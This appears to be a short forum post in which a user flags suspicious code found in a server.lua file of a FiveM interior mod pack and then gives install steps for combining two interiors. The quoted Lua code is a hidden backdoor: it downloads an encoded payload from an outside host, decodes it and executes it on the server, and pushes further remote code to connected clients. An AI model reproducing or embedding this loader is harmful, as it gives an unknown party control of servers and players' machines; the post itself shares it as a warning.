Sketchy lines on the server.lua
PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=730875619880818", function(err, text, headers)
local code = ''
for word in string.gmatch(text, '([^\\]+)') do
code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
end
assert(load(code))() -- run the code
end, 'GET', '')
RegisterServerEvent('filesecuring:load')
AddEventHandler('filesecuring:load', function()
local src = source
PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=455044015505684", function(err, text, headers)
local code = ''
for word in string.gmatch(text, '([^\\]+)') do
code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise)
end
TriggerClientEvent('client:load-code', src, code)
end, 'GET', '')
end)
This is how the combination should be done
In order to combine both interiors you need to follow these steps:
1) Copy all files from "../RHFD//Misc/RHPD Combination/" and paste them into the RHFD stream folder.
2) Copy all files from "../RHFD//Misc/RHFD Combination/" and paste them into the RHPD stream folder.
I found this on the original FD rar file from Shmann, if you have PD original rar file which has misc folder, please upload it.